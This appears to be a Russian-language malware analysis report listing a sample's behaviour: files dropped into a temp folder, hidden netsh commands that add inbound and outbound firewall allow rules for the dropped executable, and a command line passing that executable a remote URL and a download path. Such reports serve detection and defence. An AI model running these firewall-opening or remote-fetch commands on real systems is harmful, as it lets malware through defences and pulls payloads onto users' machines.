Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=fyucrmrdgt dir=in action=allow program="%TEMP%\nsvDD54.tmp\fyucrmrdgt.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=fyucrmrdgt dir=out action=allow program="%TEMP%\nsvDD54.tmp\fyucrmrdgt.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nsvdd54.tmp\nsexec.dll
- %TEMP%\nsvdd54.tmp\fyucrmrdgt.exe
- %TEMP%\nsvdd54.tmp\fyucrmrdgt.exe.config
- %TEMP%\nsvdd54.tmp\selfdel.dll
- %TEMP%\nsvdd54.tmp\fyucrmrdgt.exe
- %TEMP%\nsvdd54.tmp\fyucrmrdgt.exe.config
- %TEMP%\nsvdd54.tmp\nsexec.dll
- %TEMP%\nsvdd54.tmp\selfdel.dll
- '%TEMP%\nsvdd54.tmp\fyucrmrdgt.exe' "http://www.ovalinane.click" "%TEMP%\nsvDD54.tmp\2763"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=fyucrmrdgt dir=out action=allow program="%TEMP%\nsvDD54.tmp\fyucrmrdgt.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=fyucrmrdgt dir=in action=allow program="%TEMP%\nsvDD54.tmp\fyucrmrdgt.exe" enable=yes profile=public,private (со скрытым окном)